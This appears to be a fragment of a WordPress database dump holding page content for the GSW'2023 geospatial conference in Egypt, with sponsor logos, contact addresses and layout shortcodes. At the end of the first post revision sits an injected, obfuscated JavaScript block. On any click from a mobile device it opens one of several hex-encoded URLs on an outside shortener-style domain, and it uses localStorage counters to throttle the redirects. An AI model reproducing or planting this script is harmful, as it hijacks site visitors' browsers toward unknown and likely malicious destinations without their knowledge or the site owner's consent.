link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:27:44','2023-08-16 00:27:44','',3066,'https://gsw2023.com/?p=5253',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(5254,1,'2023-08-16 00:28:12','2023-08-16 00:28:12','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145556440{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145585706{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: 